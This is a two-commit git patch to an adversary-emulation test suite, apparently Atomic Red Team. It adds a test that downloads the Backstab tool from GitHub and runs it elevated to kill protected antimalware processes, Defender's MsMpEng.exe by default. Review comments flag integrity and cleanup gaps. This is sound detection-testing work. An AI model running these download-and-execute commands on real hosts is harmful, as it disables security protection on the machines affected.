From 4e6ac8d9456b710b0c6260e08bff60a634d68141 Mon Sep 17 00:00:00 2001
From: jovial7 <37297486+jovial7@users.noreply.github.com>
Date: Tue, 26 Apr 2022 11:45:58 -0500
Subject: [PATCH 1/2] Add new test

New test to Kill antimalware protected processes using Backstab
---
 atomics/T1562.001/T1562.001.yaml | 22 ++++++++++++++++++++++
 1 file changed, 22 insertions(+)

diff --git a/atomics/T1562.001/T1562.001.yaml b/atomics/T1562.001/T1562.001.yaml
index d04bc2f6..398a10a8 100644
--- a/atomics/T1562.001/T1562.001.yaml
+++ b/atomics/T1562.001/T1562.001.yaml
@@ -612,3 +612,25 @@ atomic_tests:
 Try {cmd /c #{AdvancedRun_Location} /EXEFilename "$env:systemroot\System32\sc.exe" /WindowState 0 /CommandLine "start WinDefend" /StartDirectory "" /RunAs 8 /Run} Catch{}
 name: powershell
 elevation_required: true
+- name: Kill antimalware protected processes using Backstab
+ description: |- Backstab loads Process Explorer driver which is signed by Microsoft and use it to terminate running processes protected by antimalware software such as MsSense.exe or MsMpEng.exe, which is otherwise not possible to kill.
+
+ https://github.com/Yaxser/Backstab
+ supported_platforms:
+ - windows
+ input_arguments:
+ process_name:
+ description: Name of the protected process you want to kill/terminate.
+ type: string
+ default: MsMpEng.exe
+ dependency_executor_name: powershell
+ dependencies:
+ - description: Backstab64.exe should exist in %temp%
+ prereq_command: if (Test-Path $env:temp\Backstab64.exe) {exit 0} else {exit 1}
+ get_prereq_command: Start-BitsTransfer -Source "https://github.com/Yaxser/Backstab/releases/download/v1.0.1-beta/Backstab64.exe" -Destination "$env:temp\Backstab64.exe" -dynamic
+ executor:
+ command: 'cd $env:temp\; .\Backstab64.exe -k -n #{process_name}'
+ name: powershell
+ elevation_required: true
+

From 1f56b44eb4bc542d7a2f8187f9ea69bdfc023b21 Mon Sep 17 00:00:00 2001
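Review bot: The added `prereq_command` only checks that `$env:temp\Backstab64.exe` exists, and `get_prereq_command` fetches the release binary over the network with no integrity check, so any file already sitting at that path, or a tampered download, satisfies the prerequisite and is then run elevated by the executor. Pin the digest of the v1.0.1-beta release and make the prerequisite compare against it, e.g. `prereq_command: if ((Get-FileHash $env:temp\Backstab64.exe -Algorithm SHA256).Hash -eq '<EXPECTED_SHA256_PLACEHOLDER>') {exit 0} else {exit 1}`; the same two lines appear as context in the second hunk of PATCH 2/2 and are not changed there. The `description` would also be more useful to a defender if it stated plainly that the test installs and loads a kernel driver, since that driver load is the observable event the test produces and what any cleanup would have to undo. The test entry is complete within this hunk.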
From: jovial7 <37297486+jovial7@users.noreply.github.com>
Date: Tue, 26 Apr 2022 13:22:02 -0500
Subject: [PATCH 2/2] update execution command

---
 atomics/T1562.001/T1562.001.yaml | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/atomics/T1562.001/T1562.001.yaml b/atomics/T1562.001/T1562.001.yaml
index 398a10a8..f5184794 100644
--- a/atomics/T1562.001/T1562.001.yaml
+++ b/atomics/T1562.001/T1562.001.yaml
@@ -615,7 +615,6 @@ atomic_tests:
 - name: Kill antimalware protected processes using Backstab
 description: |-
 Backstab loads Process Explorer driver which is signed by Microsoft and use it to terminate running processes protected by antimalware software such as MsSense.exe or MsMpEng.exe, which is otherwise not possible to kill.
-
 https://github.com/Yaxser/Backstab
 supported_platforms:
 - windows
@@ -630,7 +629,7 @@ atomic_tests:
 prereq_command: if (Test-Path $env:temp\Backstab64.exe) {exit 0} else {exit 1}
 get_prereq_command: Start-BitsTransfer -Source "https://github.com/Yaxser/Backstab/releases/download/v1.0.1-beta/Backstab64.exe" -Destination "$env:temp\Backstab64.exe" -dynamic
 executor:
- command: 'cd $env:temp\; .\Backstab64.exe -k -n #{process_name}'
+ command: '& $env:temp\Backstab64.exe -k -n #{process_name}'
 name: powershell
 elevation_required: true
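Review bot: The new `command` value in the second hunk passes the executable path to the call operator unquoted, so if the expanded temp directory contains a space PowerShell hands `&` only the first token and the test fails with a misleading "not recognized" error rather than a clear one; quoting it is a one-character-pair change, `command: '& "$env:temp\Backstab64.exe" -k -n #{process_name}'`. The executor block still has no `cleanup_command`: with the default `process_name` of `MsMpEng.exe`, a successful run leaves the test host with its antimalware engine stopped and the driver the description says Backstab loads still present, and nothing restores that state or removes the downloaded binary. The earlier test visible as context in PATCH 1/2 appears to bring the service back with `sc.exe` and `start WinDefend`; a matching `cleanup_command` here, plus removal of `$env:temp\Backstab64.exe`, would keep the host in a known state between runs. The YAML test entry this hunk edits begins in the first hunk, outside this one.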